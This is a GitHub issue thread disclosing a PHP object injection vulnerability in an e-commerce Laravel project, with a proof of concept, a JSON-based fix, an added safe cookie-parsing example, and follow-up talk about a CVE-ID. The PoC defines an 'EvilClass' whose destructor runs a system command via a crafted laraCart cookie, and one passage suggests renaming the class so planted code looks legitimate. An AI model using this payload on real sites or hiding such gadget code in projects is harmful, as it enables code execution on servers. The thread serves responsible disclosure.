Found a Vulnerability in the code
Dear reader(s),
I have found a vulnerability in the code. Can you please share the contact details to report a vulnerability I have found, or enable the security policy so that I can file a report? Awaiting the response and suggested next steps.
Kind Regards,
R.
Hello @remhopster-isdp You can share the report here and I will fix the vulnerabilities which you found. Thank you
PHP Object Injection
Summary
Using unserialize() on untrusted user input, such as data from cookies, can lead to serious security vulnerabilities, including PHP Object Injection attacks. Upon inspection and testing of the code of the platform, it was found that PHP Object Injection is possible by crafting a malicious "Evil class". By taking control of the content of the laraCart cookie, I was able to create a serialized payload. This allowed me to read files and execute arbitrary code, demonstrating the potential for Arbitrary Code Execution.
Details
The vulnerable code is found in \\app\\Cart.php in the private function "getCartProductsIds()". Vulnerable code:
if (isset($_COOKIE['laraCart']) && $_COOKIE['laraCart'] == null && !empty($_COOKIE['laraCart'])) {
    // Sink: attacker-controlled cookie bytes reach unserialize(), which instantiates any class named in the data
    $_SESSION['laraCart'] = unserialize($_COOKIE['laraCart']);
}
PoC
Start: Add an extra class to Cart.php. In this case, we created "EvilClass" to demonstrate how I could exploit the vulnerability.
class EvilClass
{
    public function __destruct()
    {
        // code executed when the unserialized object is destroyed
        //phpinfo();
        system('cmd /c dir > C:\\windows\\temp\\EvilGdump.txt');
    }
}

// Craft malicious serialized string
$maliciousData = serialize(new EvilClass());

// Set the cookie with the malicious data
setcookie('laraCart', $maliciousData, time() + 3600, '/');

// Simulate accessing the vulnerable method
$cart = new Cart();
$cart->getCartProductsIds();
and make the getCartProductsIds() function of the Cart class public in Cart.php:
public function getCartProductsIds()
If you don't make getCartProductsIds() public, the user will get an error message when going to the index page, but "system('cmd /c dir > C:\\windows\\temp\\EvilGdump.txt');" has still run. When it is set to public, the command is also executed by loading the page, but the user will see the normal website.
POC of EvilGdump.txt
Running the command "phpinfo()" (see also the code) phpinfo - Request_URI and Script_name
Injection in Cookie laraCart:
Possible real-world scenario: make it more difficult for a user or developer to spot. Create a new file with the class name 'prodclass.php', include the same code but replace 'Evil' and 'malicious' with other words like 'prods' or 'productItms', and call the class in Cart.php. Harder to detect and looks like legit code.
Solution
Use JSON encoding/decoding. Code example (not tested!):
private function getCartProductsIds()
{
    $products = array();
    if (!isset($_SESSION['laraCart']) || empty($_SESSION['laraCart'])) {
        if (isset($_COOKIE['laraCart']) && !empty($_COOKIE['laraCart'])) {
            // json_decode() only yields scalars and arrays, never instances of
            // application classes, so no __wakeup()/__destruct() gadget can fire
            $cookieData = json_decode($_COOKIE['laraCart'], true);
            // accept only well-formed JSON that decoded to an array
            if (json_last_error() === JSON_ERROR_NONE && is_array($cookieData)) {
                $_SESSION['laraCart'] = $cookieData;
                $products = $cookieData;
            }
        }
    } else {
        $products = $_SESSION['laraCart'];
    }
    return $products;
}
With JSON encoding and decoding, you avoid the risks associated with PHP's unserialize() function, as JSON does not support object serialization and hence does not invoke any magic methods like __wakeup() or __destruct(). This way, the application is safer from object injection attacks.
Impact
A03:2021 - Injection (OWASP Top 10)
PHP object injection is a vulnerability that occurs when untrusted user input is deserialized into a PHP object. This can lead to various security risks, including arbitrary code execution, data tampering, and unauthorized actions.
Affected: End-Users / Companies
Users and companies using vulnerable web applications may have their personal and sensitive information exposed or manipulated. They could also be subjected to unauthorized actions or service disruptions.
Affected Products: other
Severity: Estimated - 7.2
CVE-ID: Not yet provided.
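An added example (my code, not the reporter's PoC or the project's own code): a reader for the laraCart cookie in the spirit of the JSON fix proposed above, which never calls unserialize() and accepts nothing but a JSON list of positive integer product ids. The function name, the expected cookie shape, and PHP 8.1+ (for array_is_list() and JsonException) are assumptions.

```php
<?php
// Added example, not part of the original report or the project: decode the
// laraCart cookie without unserialize(). Assumes the cookie should carry a
// JSON list of positive integer product ids; function name is hypothetical.
declare(strict_types=1);

function readCartCookie(?string $raw): array
{
    if ($raw === null || $raw === '') {
        return [];
    }
    try {
        // json_decode() never instantiates classes, so __wakeup()/__destruct()
        // gadgets cannot fire; the depth limit bounds attacker-chosen nesting.
        $data = json_decode($raw, true, 4, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return [];                      // not JSON, e.g. serialize() output
    }
    // Only a plain list is a cart; JSON objects and bare scalars are rejected.
    if (!is_array($data) || !array_is_list($data)) {
        return [];
    }
    $ids = [];
    foreach ($data as $id) {
        if (is_int($id) && $id > 0) {   // whitelist the one shape we accept
            $ids[$id] = $id;            // keyed by id to deduplicate
        }
    }
    return array_values($ids);
}

// Constructed sample cookie values (not captured from a real site) => expected result.
$samples = [
    '[1,2,2,7]'            => [1, 2, 7],
    'O:9:"EvilClass":0:{}' => [],       // PHP-serialized object: rejected as non-JSON
    '{"a":1}'              => [],       // JSON object, not a list: rejected
    '[1,"2",-3,null]'      => [1],      // strings, negatives and null dropped
    ''                     => [],
];
foreach ($samples as $cookie => $expected) {
    $got = readCartCookie($cookie);
    printf("%-24s => %s\n", var_export($cookie, true), $got === $expected ? 'ok' : 'FAIL');
}
```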
@remhopster-isdp The issue was resolved with this commit - https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/commit/a02111a674ab49f65018b31da3011b1e396f59b1
Hi Kiril,
Great that the vulnerability is fixed.
Can you assign a CVE-ID for the vulnerability so that people can track this and also can update the code. And for me it will help enormously in my new career path.
Kind Regards,
R.
On Wed 3 Jul 2024 at 19:28, Kiril Kirkov @.***> wrote:
@remhopster-isdp https://github.com/remhopster-isdp The issue was resolved with this commit - a02111a https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/commit/a02111a674ab49f65018b31da3011b1e396f59b1
Hi Kiril,
Hope you are doing well. I am curious if you can give an update on the CVE-ID?
Kind Regards,
R.
I am not sure that is possible for that project @remhopster-isdp ?
Thanks Kiril,
But is there a difference between the project Ecommerce Laravel or Ecommerce CodeIgniter?
I think there are also forks from Laravel which are used as commercial platform.
Can we ask the GitHub security team? And await their response?
Kind regards,
R
On Mon 15 Jul 2024 at 15:47, Kiril Kirkov @.***> wrote:
I am not sure that is possible for that project @remhopster-isdp https://github.com/remhopster-isdp ?
@remhopster-isdp Yes, they are different platforms and yes they are used for Ecommerce as they are